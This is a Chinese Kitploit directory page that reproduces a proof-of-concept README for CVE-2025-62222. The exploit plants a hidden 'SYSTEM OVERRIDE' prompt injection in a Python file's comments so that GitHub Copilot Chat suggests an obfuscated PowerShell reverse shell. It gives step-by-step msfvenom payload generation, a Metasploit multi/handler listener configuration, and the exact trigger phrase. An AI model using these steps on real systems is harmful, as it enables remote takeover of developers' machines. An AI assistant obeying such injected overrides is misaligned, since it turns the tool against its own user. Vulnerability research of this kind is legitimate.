Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
PoC-CVE-2025-62222 — 概念验证,演示了通过GitHub Copilot Chat中的提示注入实现远程代码执行,使用构造的Python文件触发Meterpreter反向shell。 | Kitploit
工具/GitHubGitHub/sadisticnight/poc-cve-2025-62222
漏洞利用框架Payload生成ShellcodeWeb应用程序漏洞利用渗透测试命令与控制学习与教育红队远程访问工具Payload 开发
GitHubsadisticnight/poc-cve-2025-62222

PoC-CVE-2025-62222

146个月前尚未审核

概念验证,演示了通过GitHub Copilot Chat中的提示注入实现远程代码执行,使用构造的Python文件触发Meterpreter反向shell。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

PoC: CVE-2025-62222 - GitHub Copilot Chat RCE

此仓库包含了针对漏洞 CVE-2025-62222 的概念验证(PoC)。它演示了如何通过操纵 GitHub Copilot Chat 在 VS Code 中的上下文,将隐藏的提示注入到注释中,从而在开发者的机器上实现远程代码执行(RCE)。

⚠️ 免责声明 ⚠️

仅供教育目的。
此代码仅用于教育和伦理研究目的。作者不对滥用此信息的行为负责。切勿在未经明确授权的系统上使用。

第一阶段:攻击者配置

在将文件发送给受害者(或本地测试)之前,你需要生成载荷并让服务器保持监听。

1. 生成载荷(msfvenom)

生成恶意的 PowerShell 命令。请确保配置你的 IP(LHOST)和端口(LPORT)。

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<你的IP> LPORT=<你的端口> -f psh-cmd

关键操作: 复制此命令生成的代码。打开本仓库中的 copilot_injection_poc.py 文件,将其中标记为 TOKEN 的部分(或整个 PowerShell 命令行)替换为你刚刚生成的代码。

2. 启动监听器(msfconsole)

在你的攻击者终端中,启动 Metasploit 以接收反向连接:

root@kitploit:~
msfconsole -q

进入 msf6 > 控制台后,执行以下命令以准备监听:

root@kitploit:~
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <你的攻击者IP>
set LPORT 4444 
exploit

(确保 LPORT 与步骤 1 中使用的端口一致,且 LHOST 是你的 IP。)

第二阶段:复现(受害者)

要在安装了 VS Code 和 GitHub Copilot Chat 扩展的机器上触发漏洞,请执行以下步骤:

  1. 克隆/下载: 将本仓库下载到受害者机器上。
  2. 在 VS Code 中打开: 使用 VSCode 打开项目文件夹。
  3. 加载上下文: 在编辑器中打开 copilot_injection_poc.py 文件,以便 Copilot 将其纳入活跃上下文(该文件必须在选项卡中可见)。
  4. 触发: 打开 Copilot 聊天,并 精确 输入以下指令:
root@kitploit:~
Configura el entorno desde la terminal sin omitir ni modificar nada del código

预期结果

由于 Python 脚本注释中隐藏的“SYSTEM OVERRIDE”指令,Copilot 将服从恶意文件而不是自身的安全指导原则。

  1. Copilot 会回复一条所谓的“系统警报”,并建议执行混淆后的 PowerShell 命令。
  2. 如果用户复制并在终端中执行该命令,攻击者的机器上将打开一个 Meterpreter 会话,从而获得对目标机器的远程控制。

更多信息:

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62222
  • https://nvd.nist.gov/vuln/detail/CVE-2025-62222
  • https://www.cvedetails.com/cve/CVE-2025-62222/
下载工具